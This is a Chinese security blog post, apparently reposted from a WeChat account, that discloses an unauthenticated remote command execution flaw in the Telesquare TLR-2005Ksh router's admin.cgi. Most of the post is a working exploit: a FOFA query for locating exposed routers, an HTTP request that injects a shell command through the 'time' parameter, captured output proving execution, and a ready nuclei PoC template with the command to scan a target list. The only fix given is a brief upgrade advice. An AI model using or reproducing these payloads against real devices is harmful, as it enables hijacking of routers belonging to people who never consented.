【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

admin

138856
文章

114
评论

2023年12月18日15:03:55评论234 views字数 2552阅读8分30秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞影响

Telesquare TLR-2005Ksh 路由器

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞描述

Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款路由器。该路由器admin.cgi接口处存在RCE漏洞，未经授权的攻击者可以远程执行任意命令，会导致主机失陷。

—

FOFA搜索语句

app="TELESQUARE-TLR-2005KSH"

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞复现

第一步：向靶场发送如下数据包，在靶场执行ifconfig命令，并将执行结果写入文件test28256.txt

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/xmlDate: Mon, 27 Nov 2023 03:32:28 GMTServer: lighttpd/1.4.20

第二步：访问我们生成的文件

GET /cgi-bin/test28256.txt HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 2283Accept-Ranges: bytesContent-Type: text/plainDate: Mon, 27 Nov 2023 03:32:28 GMTEtag: "-1081099397"Last-Modified: Mon, 27 Nov 2023 03:32:28 GMTServer: lighttpd/1.4.20
br0       Link encap:Ethernet  HWaddr D8:19:CE:02:E0:A7          inet addr:192.168.86.128  Bcast:192.168.86.1  Mask:255.255.255.248          inet6 addr: fe80::da19:ceff:fe02:e0a7/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:11826278 errors:0 dropped:0 overruns:0 frame:0          TX packets:12297021 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:5237149421 (4.8 GiB)  TX bytes:2617831822 (2.4 GiB)
lo        Link encap:Local Loopback          inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

漏洞复现成功

—

nuclei poc

poc文件内容如下

id: Telesquare-TLR-2005Ksh-admin-rceinfo:  name: Telesquare TLR-2005Ksh 路由器 RCE漏洞  author: fgz  severity: critical  description: Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款路由器。该路由器admin.cgi接口处存在RCE漏洞，未经授权的攻击者可以远程执行任意命令，会导致主机失陷。  metadata:    max-request: 3    verified: true    fofa-query: app="TELESQUARE-TLR-2005KSH"
http:  - method: GET    path:      - "{{BaseURL}}/cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>{{randstr}}.txt`"  - method: GET    path:      - "{{BaseURL}}/cgi-bin/{{randstr}}.txt"    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'Link encap:')"

运行POC

nuclei.exe -t mypoc/其他/Telesquare-TLR-2005Ksh-admin-rce.yaml -l data/Telesquare-TLR-2005Ksh.txt

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

修复建议

升级到最新版本。

原文始发于微信公众号（AI与网安）：【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞

CVE-2024-22243 Spring Web UriComponentsBuilder URL 解析不当漏洞分析

hi-bridge网关-download文件读取

发表评论